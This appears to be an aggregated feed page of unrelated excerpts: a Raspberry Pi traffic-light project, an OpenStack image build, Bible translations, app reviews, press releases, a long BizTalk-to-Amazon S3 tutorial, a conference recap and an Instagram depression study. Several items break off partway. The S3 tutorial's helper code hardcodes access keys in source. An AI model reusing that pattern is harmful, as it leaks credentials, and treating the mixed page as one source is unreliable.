The software setup is very simple, there is a Python web server (using the Flask library) running on a Raspberry Pi that controls the traffic lights using GPIO Zero. When the appendTestTrafficLight() function (in run_tests.js.erb) appends the traffic light image to the webpage I made it send an http 'get' request to the Raspberry Pi web server to set the physical traffic lights at the same time. At the moment the IP address of the Raspberry Pi is hard coded in the 'run_tests.js.erb' file so I have to rebuild the web image if anything changes but it was only meant to be a joke/proof of concept. The code is on a branch called traffic_lights on my fork of the cyber-dojo web repository.
The hardware is also relatively simple, there is a converter board on the Pi; this only converts the IO pin output connector of the Raspberry Pi to the cable that attaches to the traffic lights.
The other end of the cable from the converter board attaches to the board in the top left of the inside the traffic lights; this has some optoisolators that drive the relays in the top right which in turn switch on and off the transformers (the red thing in the bottom left) that drive the lights.
I have to give credit to Steve Amor for building the hardware for the traffic lights. They are usually used during events we run to teach coding to children (and sometimes adults). The converter board has LEDs, switches and buzzers on it to show that there isn't a difference between writing software to toggle LEDs vs driving actual real world systems, it's just what's attached to the pin. Having something where they can run the same code to drive LEDs and drive real traffic lights helps to emphasise this point.



          Evaluator Group Announces Storage Specific Benchmark for Virtual Desktop Infrastructure, VDI-IOmark        

VDI-IOmark measures IO performance streamlines proof of concept testing for VMware View environments.

(PRWeb August 02, 2011)

Read the full story at http://www.prweb.com/releases/2011/8/prweb8679296.htm


          Chris Smart: Creating an OpenStack Ironic deploy image with Buildroot        

Edit: See this post on how to automate the builds using buildimage scripts.

Ironic is an OpenStack project which provisions bare metal machines (as opposed to virtual).

A tool called Ironic Python Agent (IPA) is used to control and provision these physical nodes, performing tasks such as wiping the machine and writing an image to disk. This is done by booting a custom Linux kernel and initramfs image which runs IPA and connects back to the Ironic Conductor.

The Ironic project supports a couple of different image builders, including CoreOS, TinyCore and others via Disk Image Builder.

These have their limitations, however, for example they require root privileges to be built and, with the exception of TinyCore, are all hundreds of megabytes in size. One of the downsides of TinyCore is limited hardware support and although it’s not used in production, it is used in the OpenStack gating tests (where it’s booted in virtual machines with ~300MB RAM).

Large deployment images means a longer delay in the provisioning of nodes and so I set out to create a small, customisable image that solves the problems of the other existing images.

Buildroot

I chose to use Buildroot, a well regarded, simple to use tool for building embedded Linux images.

So far it has been quite successful as a proof of concept.

Customisation can be done via the menuconfig system, similar to the Linux kernel.

Buildroot menuconfig

Source code

All of the source code for building the image is up on my GitHub account in the ipa-buildroot repository. I have also written up documentation which should walk you through the whole build and customisation process.

The ipa-buildroot repository contains the IPA specific Buildroot configurations and tracks upstream Buildroot in a Git submodule. By using upstream Buildroot and our external repository, the IPA Buildroot configuration comes up as an option for regular Buildroot build.

IPA in list of Buildroot default configs

Buildroot will compile the kernel and initramfs, then post build scripts clone the Ironic Python Agent repository and creates Python wheels for the target.

This is so that it is highly flexible, based on the version of Ironic Python Agent you want to use (you can specify the location and branch of the ironic-python-agent and requirements repositories).

Set Ironic Python Agent and Requirements location and Git version

I created the kernel config from scratch (using tinyconfig) and deliberately tried to balance size and functionality. It should boot on most Intel based machines (BIOS and UEFI), however hardware support like hard disk and ethernet controllers is deliberately limited. The goal was to start small and add more support as needed.

By using Buildroot, customising the Linux kernel is pretty easy! You can just run this to configure the kernel and rebuild your image:

make linux-menuconfig && make

If this interests you, please check it out! Any suggestions are welcome.


          Questions of Scripture        
I thought I had a script all worked out for my narrative version of Christ's Life. I put together a couple of "proof of concept" pieces and played them for CAC. There were some audio issues (I'm experimenting with different mic stands, but I'll get that worked out), but more to the point CAC wasn't thrilled about the language of the translation I'd used.

For various reasons I selected the King James Version. It would be recognizable and acceptable to a great many English-speaking Christians and it has the benefit of being in the public domain. CAC objected, though, on the grounds that the language is archaic. She would have preferred for me to use the New American Bible, but the copyright closes off that option.

(ASIDE: The podcast Verbum Domini ran into trouble with this last year. The USSCB essentially asked the host to cease and desist and has subsequently started their own daily reading podcast. The whole thing was document by Fr. Roderick on The Daily Breakfast. I can certainly understand why the Bishops would want to protect the copyright on the NAB, but the host of Verbum Domini did a great job. It would have been nice if he could have continued.)

That leaves me with limited options and I've spent much of the afternoon reading up on Bible history. Fascinating stuff. I've found that my best option is probably to use the Douay-Rheims version as it is a Catholic translation and was the basis of virtually all English Catholic bibles until the middle of the last century. I had heard of it, but I wasn't particularly familiar with the history behind it. The text itself is based on the Latin Vulgate translation by St. Jerome. The text was translated during the time when Catholics were being persecuted in England and priests were trained across the channel in Douay, France. There are plenty of web references, so I'll not bore you with them here. Suffice it to say that the interplay of personalities and texts is complex.

Copies of various versions of the Douay-Rheims can be found on-line including one here (oddly, it's not in their drop-down list, but it can be found with a little digging) and here.The Douay-Rheims was replaced in America in the middle of the twentieth-century by the Revised Standard Version -- Catholic Edition. I've found it on-line, but the copyright status is not entirely clear to me. More research is in order.

Oh, and while I was exploring I found a fellow named Jimmy Akin who has a fascinating story of Faith and conversion and a terrific page which explains his reasons for conversion. It was one of those wonderful little things that pops up when doing web research.
          Comment on Seeing AI: First Impressions by Marx Melencio        
I'm completely blind. I've been testing this rather heavily in my iPhone 6S for the past 3 days; and - Here's what I think: <blockquote> <blockquote> PROS << • Remarkable Face Identification - For labeling faces with names, also works offline; • Excellent Document OCR Prepping - Guidance for centering document with text, doesn't work offline; • Cool Document OCR Processing - For converting printed text to digital text including formatting, doesn't work offline; • Helpful Face / Person Localization Within Captured Scene - Provides location details of detected face, also works offline; • Good Short Text Recognition - Converts brief printed text into digital text, limited to around 12 to 20 characters or 2 to 4 words, works offline, though can sometimes process 300 characters or more, though only noticed this when online; • Decent Product Barcode Processing - Useful product details, only works online; • Can be used to process photos / images stored across your other apps; and • It's free ... CONS << • Often Inaccurate Scene Recognition - Many errors and false positives when describing captured images, only works online; • No location details for detected objects, just for persons / faces; • Terrible Face Recognition - Persons need to be staring straight at the camera to be detected; • Non-Intuitive Product Barcode Recognition - Difficult to guess where barcode is despite beeping sound to guide user when barcode is detected, only works online; • Non-Intuitive Short Text OCR Processing - Doesn't provide guidance; • Only available at the moment for iOS users in the US, Canada, New Zealand, India, Singapore and Hong Kong; • Nothing at the moment for Android; • No direct support for third party wearable / spy cameras with earphone and mic - Quite inconvenient to take out your iPhone every time you need it, especially when walking around; and • Doesn't provide voice and camera gesture control ... VERDICT << • Similar sentiments to what this Mashable page said - "Microsoft's 'talking camera' app for the blind isn't as magical as it sounds, It needs some work" > http://mashable.com/2017/07/12/microsoft-seeing-ai-app-for-blind/#7xAs9Y8zOsqT </blockquote> </blockquote> I'm sure Microsoft'll be improving this in the next few months or so. Also: Just wanted to share a proof of concept prototype that I created, which I'm currently working on through a 0 equity inventor's grant from our national government's Department of Science & Technology for an AI software development and hardware device manufacturing project: https://www.youtube.com/watch?v=MXgW7folvps?rel=0
          Proof of Concept – Emulate NES Classic Using Raspberry Pi 3        
Revisions: 4/17/17: Initial release. Hey guys, If you haven’t heard, Nintendo discontinued the NES Classic! I was thinking of getting one for the longest time, and now it will be super hard because I am not going to fork over $200+ USD for 30 games! Well, I have a raspberry pi 3, and I followed […]
          Comment on How Much Power Does An Electric Bicycle Need? by Micah        
$200 is on the low end of what is possible. If this is just a proof of concept, finding some used batteries and building a custom friction drive using an old DC motor will likely be a good option. Look up "friction drive ebike" and you'll find many examples. Any ready-to-go ebike kit is going to break your $200 budget, so you're left with building something custom.
          Italian Consumer Electronics Retailer Unieuro SpA Drives Efficiency Through Supply Chain        

Anticipate Demand and Simplify Operations with a Unified View of Inventory

Consumer electronics retailer Unieuro SpA has purchased Oracle Retail Demand Forecasting and Oracle Retail Allocation & Replenishment to optimize stock levels, increase profitability and improve cash flow.

Unieuro aims at improving its centralized supply chain organization in order to support effective omnichannel replenishment processes including DOS, affiliate and online channels. With this initiative, Unieuro is in a stronger position to optimize the cross-channel opportunity to minimize stock, reduce obsolescence and streamline organizational costs. The supply chain organization will have the much needed visibility into demand coming from all touch points and to ultimately orchestrate the supply, reduce lost sales and increase customer satisfaction.

“Oracle Retail provides a distinctive replenishment approach for short lifecycle products which includes attribute based forecasting.” said Luigi Fusco, COO, Unieuro SpA. “We believe the optimized orchestration of the stock across channels will help improve our fulfillment rate to improve customer satisfaction and reduce obsolescence to eliminate costs.”

“After conducting a proof of concept with our data, Oracle Retail gained our confidence to move forward with the project. We validated our choice with customer references in the consumer electronics and hardlines businesses,” said Luca Girotti, IT Director, Unieuro. “We are thankful to the Sopra Steria team who helped us evaluate the market offerings and ultimately decide to move forward with the Oracle Retail solution.”

“Retailers like Unieuro can proactively position inventory in the right place in the right quantity by using analytic algorithms to drive accuracy and visibility. The visibility of this new supply chain organization will help Unieuro inspire consumer loyalty with a better in-stock position wherever they are inspired to shop,” said Ray Carlin, Senior Vice President and General Manager, Oracle Retail.

About Oracle Retail:

Oracle provides retailers with a complete, open, and integrated suite of best-of-breed business applications, cloud services, and hardware that are engineered to work together and empower commerce. Leading fashion, grocery, and specialty retailers use Oracle solutions to anticipate market changes, simplify operations and inspire authentic brand interactions. For more information, visit our website at www.oracle.com/retail.

About Oracle

The Oracle Cloud delivers hundreds of SaaS applications and enterprise-class PaaS and IaaS services to customers in more than 195 countries and territories while processing 55 billion transactions a day. For more information about Oracle (NYSE:ORCL), please visit us at oracle.com.

About Unieuro S.p.A.

Unieuro S.p.A. – with a widespread network of 460 outlets throughout the country, including direct stores (180) and affiliated stores (280), and its digital platform unieuro.it– is now the largest omnichannel distributor of consumer electronics and household appliances by number of outlets in Italy. Unieuro is headquartered in Forlì and has a logistics hub in Piacenza. It has more than 3,900 employees and revenues that exceeded € 1.6 billion for the year ending 28 February 2017.

 


          Proof of concept for blockchain implementation necessary and tricky        
To bring a blockchain implementation to fruition, CIOs will need to tee up a proof of concept and a field test before going to full production. It won't be easy.
          The Octinct Story        
Originally Developed by Jonathan Guberman during the time I was working on the arduino monome project, the Tinct was a 4x4 fully pwm adjustable color buttonpad designed to be compatible with the monome serial protocol. Eventually Jonathan designed a PCB and wrote a custom router and firmware. Once he had the software working properly the proof of concept was the end of his desire to continue the project (not to mention serious school obligations).

Devon Jones breadboarded his Octinct as well and wrote a better performing router in python, all the meanwhile my Ocinct remained in a drawer soldered up but never functional due to my desire not the breadboard it. The Octinct uses 24-pin IDC cables which are fairly difficult to integrate into a breadboard unless you purchase specialized cables. The original intention was that Jonathan would eventually create a control board that would tie all the boards together, however it never developed. Similarly at the time the wishes of the buttonpads creator were that the buttonpads to remain closed source.

After the popularity the arduinome recieved I thought it was time to revisit the Octinct as something the monome community may have actual interest in.
          BizTalk 2013–Integration with Amazon S3 storage using the WebHttp Adapter        

I have recently encountered a requirement where we had to integrate a legacy Document Management system with Amazon in order to support a Mobile-Field Worker application.  The core requirement is that when a document reaches a certain state within the Document Management System, we need to publish this file to an S3 instance where it can be accessed from a mobile device.  We will do so using a RESTful PUT call.

Introduction to Amazon S3 SDK for .Net

Entering this solution I knew very little about Amazon S3.  I did know that it supported REST and therefore felt pretty confident that BizTalk 2013 could integrate with it using the WebHttp adapter.

The first thing that I needed to do was to create a Developer account on the Amazon platform. Once I created my account I then downloaded the Amazon S3 SDK for .Net. Since I will be using REST technically this SDK is not required however there is a beneficial tool called the AWS Toolkit for Microsoft Visual Studio.  Within this toolkit we can manage our various AWS services including our S3 instance.  We can create, read, update and delete documents using this tool.  We can also use it in our testing to verify that a message has reached S3 successfully.

image

Another benefit of downloading the SDK is that we can use the managed libraries to manipulate S3 objects to better understand some of the terminology and functionality that is available.  Another side benefit is that we can fire up Fiddler while we are using the SDK and see how Amazon is forming their REST calls, under the hood, when communicating with S3

Amazon S3 Accounts

When you sign up for an S3 account you will receive an Amazon Key ID and a Secret Access Key. These are two pieces of data that you will need in order to access your S3 services.  You can think of these credentials much like the ones you use when accessing Windows Azure Services.

image

BizTalk Solution

To keep this solution as simple as possible for this Blog Post, I have stripped some of the original components of the solution so that we can strictly focus on what is involved in getting the WebHttp Adapter to communicate with Amazon S3.

For the purpose of this blog post the following events will take place:

  1. We will receive a message that will be of type: System.Xml.XmlDocument.  Don’t let this mislead you, we can receive pretty much any type of message using this message type including text documents, images and pdf documents.
  2. We will then construct a new instance of the message that we just received in order to manipulate some Adapter Context properties. You may now be asking – Why do I want to manipulate Adapter Context properties?  The reason for this is that since we want to change some of our HTTP Header properties at runtime we therefore need to use a Dynamic Send Port as identified by Ricardo Marques.

    image

    The most challenging part of this Message Assignment Shape was populating the WCF.HttpHeaders context property.  In C# if you want to populate headers you have a Header collection that you can populate in a very clean manner:

    headers.Add("x-amz-date", httpDate);

    However, when populating this property in BizTalk it isn’t as clean.  You need to construct a string and then append all of the related properties together.  You also need to separate each header attribute onto a new line by appending “\n” . 

    Tip: Don’t try to build this string in a Helper method.  \n characters will be encoded and the equivalent values will not be accepted by Amazon so that is why I have built out this string inside an Expression Shape.

    After I send a message(that I have tracked by BizTalk) I should see an HTTP Header that looks like the following:

    <Property Name="HttpHeaders" Namespace="http://schemas.microsoft.com/BizTalk/2006/01/Adapters/WCF-properties" Value=

    "x-amz-acl: bucket-owner-full-control
    x-amz-storage-class: STANDARD
    x-amz-date: Tue, 10 Dec 2013 23:25:43 GMT
    Authorization: AWS <AmazonKeyID>:<EncryptedSignature>
    Content-Type: application/x-pdf
    Expect: 100-continue
    Connection: Keep-Alive"/>

    For the meaning of each of these headers I will refer you to the Amazon Documentation.  However, the one header that does warrant some additional discussion here is the Authorization header.  This is how we authenticate with the S3 Service.  Constructing this string requires some additional understanding.  To simplify the population of this value I have created the following helper method which was adopted from the following post on StackOverflow:

    public static string SetHttpAuth(string httpDate)
         {
              string AWSAccessKeyId = "<your_keyId>";
              string AWSSecretKey = "<your_SecretKey>";

             string AuthHeader = "";
            string canonicalString = "PUT\n\napplication/x-pdf\n\nx-amz-acl:bucket-owner-full-control\nx-amz-date:" + httpDate + "\nx-amz-storage-class:STANDARD\n/<your_bucket>/310531500150800.PDF";
                

             // now encode the canonical string
             Encoding ae = new UTF8Encoding();
             // create a hashing object
             HMACSHA1 signature = new HMACSHA1();
             // secretId is the hash key
             signature.Key = ae.GetBytes(AWSSecretKey);
             byte[] bytes = ae.GetBytes(canonicalString);
             byte[] moreBytes = signature.ComputeHash(bytes);
             // convert the hash byte array into a base64 encoding
             string encodedCanonical = Convert.ToBase64String(moreBytes);
             // finally, this is the Authorization header.
             AuthHeader = "AWS " + AWSAccessKeyId + ":" + encodedCanonical;

             return AuthHeader;
         }

    The most important part of this method is the following line(s) of code:

    string canonicalString = "PUT\n\napplication/x-pdf\n\nx-amz-acl:bucket-owner-full-control\nx-amz-date:" + httpDate + "\nx-amz-storage-class:STANDARD\n/<your_bucket>/310531500150800.PDF";
                

    The best way to describe what is occurring is to borrow the following from the Amazon documentation.

    The Signature element is the RFC 2104HMAC-SHA1 of selected elements from the request, and so the Signature part of the Authorization header will vary from request to request. If the request signature calculated by the system matches the Signature included with the request, the requester will have demonstrated possession of the AWS secret access key. The request will then be processed under the identity, and with the authority, of the developer to whom the key was issued.

    Essentially we are going to build up a string that reflects that various aspects of our REST call (Headers, Date, Resource) and then create a Hash using our Amazon secret.  Since Amazon is aware of our Secret they can decrypt this payload and see if it matches our actual REST call.  If it does – we are golden.  If not, we can expect an error like the following:

    A message sent to adapter "WCF-WebHttp" on send port "SendToS3" with URI http://<bucketname>.s3-us-west-2.amazonaws.com/ is suspended.
    Error details: System.Net.WebException: The HTTP request was forbidden with client authentication scheme 'Anonymous'.
    <?xml version="1.0" encoding="UTF-8"?>
    <Error><Code>SignatureDoesNotMatch</Code><Message>The request signature we calculated does not match the signature you provided. Check your key and signing method.</Message><StringToSignBytes>50 55 54 0a 0a 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 70 64 66 0a 0a 78 2d 61 6d 7a 2d 61 63 6c 3a 62 75 63 6b 65 74 2d 6f 77 6e 65 72 2d 66 75 6c 6c 2d 63 6f 6e 74 72 20 44 65 63 20 32 30 31 33 20 30 34 3a 35 37 3a 34 35 20 47 4d 54 0a 78 2d 61 6d 7a 2d 73 74 6f 72 61 67 65 2d 63 6c 61 73 73 3a 53 54 41 4e 44 41 52 44 0a 2f 74 72 61 6e 73 61 6c 74 61 70 6f 63 2f 33 31 30 35 33 31 35 30 30 31 35 30 38 30 30 2e 50 44 46</StringToSignBytes><RequestId>6A67D9A7EB007713</RequestId><HostId>BHkl1SCtSdgDUo/aCzmBpPmhSnrpghjA/L78WvpHbBX2f3xDW</HostId><SignatureProvided>SpCC3NpUkL0Z0hE9EI=</SignatureProvided><StringToSign>PUT

    application/x-pdf

    x-amz-acl:bucket-owner-full-control
    x-amz-date:Thu, 05 Dec 2013 04:57:45 GMT
    x-amz-storage-class:STANDARD
    /<bucketname>/310531500150800.PDF</StringToSign><AWSAccessKeyId><your_key></AWSAccessKeyId></Error>

    Tip: Pay attention to these error messages as they really give you a hint as to what you need to include in your “canonicalString”.  I discounted these error message early on and didn’t take the time to really understand what Amazon was looking for. 

    For completeness I will include the other thresshelper methods that are being used in the Expression Shape.  For my actual solution I have included these in a configuration store but for the simplicity of this blog post I have hard coded them.

    public static string SetAmzACL()
        {
            return "bucket-owner-full-control";
        }

        public static string SetStorageClass()
        {
            return "STANDARD";
        }

    public static string SetHeaderDate()
          {
              //Use GMT time and ensure that it is within 15 minutes of the time on Amazon’s Servers
              return DateTime.UtcNow.ToString("ddd, dd MMM yyyy HH:mm:ss ") + "GMT";
             
          }

  3. The next part of the Message Assignment shape is setting the standard context properties for WebHttp Adapter.  Remember since we are using a Dynamic Send Port we will not be able to manipulate these values through the BizTalk Admin Console.

    msgS3Request(WCF.BindingType)="WCF-WebHttp";
    msgS3Request(WCF.SecurityMode)="None";
    msgS3Request(WCF.HttpMethodAndUrl) = "PUT";  //Writing to Amazon S3 requires a PUT
    msgS3Request(WCF.OpenTimeout)= "00:10:00";
    msgS3Request(WCF.CloseTimeout)= "00:10:00";
    msgS3Request(WCF.SendTimeout)= "00:10:00";
    msgS3Request(WCF.MaxReceivedMessageSize)= 2147483647;

    Lastly we need to set the URI that we want to send our message to and also specify that we want to use the WCF-WebHttp adapter.

    Port_SendToS3(Microsoft.XLANGs.BaseTypes.Address)="http://<bucketname>.s3-us-west-2.amazonaws.com/310531500150800.PDF";
    Port_SendToS3(Microsoft.XLANGs.BaseTypes.TransportType)="WCF-WebHttp";

    Note: the last part of my URI 310531500150800.PDF represents my Resource.  In this case I have hardcoded a file name.  This is obviously something that you want to make dynamic, perhaps using the FILE.ReceivedFileName context property.

  4. Once we have assembled our S3 message we will go ahead and send it through our Dynamic Solicit Response Port.  The message that we are going to send to Amazon and Receive back is once again of type System.Xml.XmlDocument
  5. One thing to note is that when you receive a response back from Amazon is that it won’t actually have a message body (this is inline with REST).  However even though we receive an empty message body, we will still find some valuable Context Properties.  The two properties of interest are:

    InboundHttpStatusCode

    InboundHttpStatusDescription

    image

     

  6. The last step in the process is to just write our Amazon response to disk.  But, as we have learned in the previous point is that our message body will be empty but does give me an indicator that the process is working (in a Proof of Concept environment).

Overall the Orchestration is very simple.  The complexity really exists in the Message Assignment shape. 

image

 Testing

Not that watching files move is super exciting, but I have created a quick Vine video that will demonstrate the message being consumed by the FILE Adapter and then sent off to Amazon S3.

 https://vine.co/v/hQ2WpxgLXhJ

Conclusion

This was a pretty fun and frustrating solution to put together.  The area that caused me the most grief was easily the Authorization Header.  There is some documentation out there related to Amazon “PUT”s but each call is different depending upon what type of data you are sending and the related headers.  For each header that you add, you really need to include the related value in your “canonicalString”.  You also need to include the complete path to your resource (/bucketname/resource) in this string even though the convention is a little different in the URI.

Also it is worth mentioning that /n Software has created a third party S3 Adapter that abstracts some of the complexity  in this solution.  While I have not used this particular /n Software Adapter, I have used others and have been happy with the experience. Michael Stephenson has blogged about his experiences with this adapter here.


          BizTalk Summit 2013 Wrap-up        

On November 21st and 22nd I had the opportunity to spend a couple days at the 2nd annual BizTalk Summit held by Microsoft in Seattle.  At this summit there were approximately 300 Product Group members, MVPs, Partners and Customers.  It was great to see a lot of familiar faces from the BizTalk community and talk shop with people who live and breathe integration.

Windows Azure BizTalk Services reaches GA

The Summit started off with a bang when Scott Gu announced that Windows Azure BizTalk Services has reached General Availability (GA)!!!   What this means is that you can receive production level support from Microsoft with 99.9% uptime SLA. 

 

image

During the preview period, Microsoft was offering a 50% discount on Windows Azure BizTalk Services (WABS).  This preview pricing ends at the end of the year.  So if you have any Proof of Concept (POC) apps running in the cloud that you aren’t actively using, please be aware of any potential billing implications.

Release Cadence

The next exciting piece of news coming from Microsoft is the release cadence update for the BizTalk Server product line.  As you have likely realized, there is usually a BizTalk release shortly after the General Availability of Platform updates.  So when a new version of Windows Server, SQL Server or Visual Studio is launched, a BizTalk Server release usually closely follows.  Something that is changing within the software industry is the accelerated release cadences by Microsoft and their competitors.  A recent example of this accelerated release cadence is Windows 8.1, Windows Server 2012 R2 and Visual Studio 2013.  These releases occurred much sooner than they have in the passed.  As a result of these new accelerated timelines the BizTalk Product Group has stepped-up, committing to a BizTalk release every year!  These releases will alternate between R2 releases and major releases.  For 2014, we can expect a BizTalk 2013 R2 and in 2015 we can expect a full release.

BizTalk Server 2013 R2

So what can we expect in the upcoming release?

  • Platform alignment(Windows, SQL Server, Visual Studio) and industry specification updates (SWIFT).
  • Adapter enhancements including support for JSON (Yay!), Proxy support for SFTP and authorization enhancements for Windows Azure Service Bus.  A request I do have for the product team is please include support for Windows Server Service Bus as well.
  • Healthcare Accelerator improvements.  What was interesting about this vertical is it is the fastest growing vertical for BizTalk Server which justifies the additional investments.

image

 

Hybrid Cloud Burst

There were a lot of good sessions but one that I found extremely interesting was the session put on by Manufacturing, Supply Chain, and Information Services (MSCIS).  This group builds solutions for the Manufacturing and Supply Chain business units within Microsoft. You may have heard of a “little” franchise in Microsoft called XBOX.  The XBOX franchise heavily relies upon Manufacturing and Supply chain processes and therefore MSCIS needs to provide solutions that address the business needs of these units.  As you are probably aware, Microsoft has recently launched XBOX One which is sold out pretty much everywhere.  As you can imagine building solutions to address the demands of a product such as XBOX would be pretty challenging.  Probably the biggest hurdle would be building a solution that supports the scale needed to satisfy the messaging requirements that many large Retailers, Manufacturers and online customers introduce.

In a traditional IT setting you throw more servers at the problem.  The issue with this is that it is horribly inefficient.  You essentially are building for the worst case (or most profitable) but when things slow down you have spent a lot of money and you have poor utilization of your resources.  This leads to a high total cost of ownership (TCO). 

Another challenge in this solution is that an ERP is involved in the overall solution.  In this case it is SAP(but this would apply to any ERP) and you cannot expect an ERP to provide the performance to support ‘cloud scale’.  At least not in a cost competitive way. If you have built a system in an Asynchronous manner you can now throttle your messaging and therefore not overwhelm your ERP system.

MSCIS has addressed both of these major concerns by building out a Hybrid solution. By leveraging Windows Azure BizTalk Services and Windows Azure Service Bus Queues/Topics in the cloud they can address the elasticity requirements that a high demand product like XBOX One creates. As demand increases, additional BizTalk Services Units can be deployed so that Manufacturers, Retailers and Customers are receiving proper messaging acknowledgements.  Then On-Premise you can keep your traditional capacity for tools and applications like BizTalk Server 2013 and SAP without introducing significant infrastructure that will not be fully utilized all the time.

Our good friend, Mandi Ohlinger ,who is a technical writer with the BizTalk team, worked with the MSCIS  to document the solution.  You can read more about the solution on the BizTalk Dev Center.  I have included a pic of the high-level architecture below.

image

While Microsoft is a large software company(ok a Devices and Services company) what we often lose sight of is that Microsoft is a very large company (>100 000) employees and they have enterprise problems just like any other company does.  It was great to see how Microsoft uses their own software to address real world needs.  Sharing these types of experiences is something that I would really like to see more of.

Symmetry

(These are my own thoughts and do not necessarily reflect Microsoft’s exact roadmap)

If you have evaluated Windows Azure BizTalk Services you have likely realized that there is not currently symmetry between the BizTalk Service and BizTalk Server.  BizTalk Server has had around 14 years (or more) of investment where as BizTalk Services, in comparison, is relatively new.  Within Services we are still without core EAI capabilities like Business Process Management (BPM)/Orchestration/Workflow, Business Activity Monitoring (BAM), Business Rules Engine (BRE), comprehensive set of adapters and complete management solution.

With BizTalk Server we have a mature, stable, robust Integration platform.  The current problem with this is that it was built much before people started thinking about cloud scale.  Characteristics such as MSDTC and even the MessageBox have contributed to BizTalk being what it is today (a good platform), but they do not necessarily lend themselves to new cloud based platforms.  If you look under the hood in BizTalk Services you will find neither of these technologies in place.  I don’t necessarily see this as a bad thing.

A goal of most, if not all, products that Microsoft is putting is the cloud is symmetry between On-Premise and Cloud based offerings.  This puts the BizTalk team in a tough position.  Do they try to take a traditional architecture like BizTalk Server and push it into the cloud, or built an Architecture on technologies that better lend themselves to the cloud and then push them back on premise? The approach, going forward,  is innovating in the cloud and then bringing those investments back on-premise in the future.

Every business has a budget and priorities have to be set.  I think Microsoft is doing the right thing by investing in the future instead of making a lot of investments in the On-Premise offering that we know will be replaced by the next evolution of BizTalk.  There were many discussions between the MVPs during this week in Seattle on this subject with mixed support across both approaches. With the explosion of Cloud and SaaS applications we need an integration platform that promotes greater agility, reduces complexity and addresses scale in a very efficient manner instead of fixing some of the deficiencies that exist in the current Server platform. I do think the strategy is sound, however it will not be trivial to execute and will likely take a few years as well.

Adapter Eco-system

Based upon some of the sessions at the BizTalk Summit, it looks like Microsoft will be looking to create a larger ISV eco-system around BizTalk Services.  More specifically in the Adapter space.  The reality is that the current adapter footprint in BizTalk Services is lacking compared to some other competing offerings.  One way to address this gap is to leverage trusted 3rd parties to build and make their adapters available through some sort of marketplace. I think this is a great idea provided there is some sort of rigor that is applied to the process of submitting adapters.  I would not be entirely comfortable running mission critical processes that relied upon an adapter that was built by a person who built it as a hobby.  However, I would not have an issue purchasing an adapter in this fashion from established BizTalk ISV partners like BizTalk360 or /nSoftware.

Conclusion

All in all it was a good summit.  It was encouraging to see the BizTalk team take BizTalk Services across the goal line and make it GA.  It was also great to see that they have identified the need for an accelerated release cadence and shared some news about the upcoming R2 release.  Lastly it was great to connect with so many familiar faces within the BizTalk community.  The BizTalk community is not a huge community but it is definitely international so it was great to chat with people who you are used to interacting with over Twitter, Blogs or LinkedIn.

In the event you still have doubts about the future of BizTalk, rest assured the platform is alive and well!


          Your Instagram Photos May Reveal Whether Or Not You Have Depression        
[object Object]

A picture may be worth a thousand words, as the saying goes, but it could also be worth a life-saving diagnosis. Your social media photos may reveal clues to the state of your mental health, according to a new study.

In a small study of 166 people, researchers examined more than 43,000 pictures on Instagram on their subjects’ profiles. Researchers also asked questions about each participant’s mental health history. A little less than half of the participants had been diagnosed with depression within the past three years.

The researchers then developed an algorithm that analyzed elements of the Instagram photos, including components like colors, the number of people in a picture and the number of comments and likes the photo received. Those who had depression typically posted images that contained bluer, darker hues and had fewer faces in the images.

Participants with depression were also more likely not to use filters when they were editing and uploading a photo. When they did opt for an enhancement, they “disproportionately favored the ‘Inkwell’ filter, which converts color photographs to black-and-white images,” the authors wrote. Healthy participants tended to favor the “Valenica” filter, which makes the tint more vibrant.

The difference between photo filters healthy participants used in the study and what people with depression typically chose.

Ultimately, using their observations about photo selection and filtering, the researchers created an algorithm that accurately determined if the user had depression 70 percent of the time. The computer program even picked up on signs of depression in a person’s photos that were posted before they were officially diagnosed.

The study is what’s known as “proof of concept,” which essentially means testing to see if a theory has a real-world application, so it shouldn’t be taken as gospel quite yet. For starters, the sample size was small and the volunteers had certain qualities in common: They were willing to submit surveys on their mental health and were relatively active on social media. All of this makes it difficult to know if the study’s outcomes can be applied to an average Instagram user, according to study author Chris Danforth, co-director at the University of Vermont’s Computational Story Lab.

The researchers do hope that the results help encourage scientists to conduct more research on the intersection of technology and depression signs, which could possibly lead to better early detection for mental illness in the future.

“It shows some promise to the idea that you might be able to build a tool like this to get individuals help sooner,” Danforth told HuffPost, adding that the program could have some utility for doctors when it comes to diagnosing patients who may only come in once every few years for a checkup.

The results of the study also align with what mental health professionals have observed in the past, Danforth said. Those with depression tend to withdraw from social groups, so it makes sense that those participants in the study had fewer people in their photos. Their worldview is often darker, he added, which could explain the photo filters they tend to choose.

Nearly 300 million people worldwide are affected by depression. Ideally, Danforth says the best outcome of technology like this is getting those individuals the medical support that they need. Especially when they may be unaware about what’s going on or hesitant to reach out on their own.

“The end goal of this would be creating something that monitors a person’s voice, how they’re moving around and what their social network looks like ― all the stuff we already reveal to our phones,” Danforth said. “Then that could give doctors a ping to check in or at least some insight. Because maybe there’s something going on that even the individual doesn’t recognize about their behavior.”

Increasingly, researchers are mining social media as a data-rich resource about how people live. Back in 2013, researchers at the University of Vermont released a comprehensive report on the happiest and least happiest states based on geotagged tweets. 

Social media isn’t going anywhere, so incorporating it into important health research is a win for everyone. The study was published in the journal EPJ Data Science.

Also on HuffPost
Celebrities On The Importance Of Mental Health

          Join us for “Real World Deployments for Industrial Applications” Webinar        
There has been a lot of discussion lately around why IoT projects fail. Many projects stall at the proof of concept (POC) phase, and only about a quarter of these investments are considered a success.  With these setbacks however, there are some notable achievements as well. As part of our factory of the future webinar […]
          DH2i Unveils New Sandbox Lab for the Rapid Proof of Concept (POC) Testing of Container Management Software for Microsoft Windows Applications        
New POC Lab Demonstrates How Enterprises Can Go from Standalone to High Availability (HA) Failover Clusters in Just a Few Minutes.
          How to Automate Processing of Azure Analysis Services Models        
I’ve been working on a proof of concept for a customer that involved using Azure Analysis Services as a cache for some data in an Azure Data Warehouse instance. One of the things I’ve been working ...
          141: Managing People as a Fast Growth Startup with Katelyn Gleason of Eligible.com        

At 23, Katelyn Gleason faced, like many people in their early 20s, an existential crisis. She just didn't know what she wanted to do.

"I started thinking about jobs. I was like 'God if I'm going to have to do this for the rest of my life it better be something I really care about, that can be my life's work, that I can really invest all of my time and all my energy into,'" Gleason says.

Her first step was to start reading the biographies of some of the greatest individuals in human history—Marie Curie, Jane Austen, Abraham Lincoln, anything she could get her hands on. Gleason's goal was to learn as much as she could about these great people and how they managed to leave such a large legacy and imprint on humankind today.

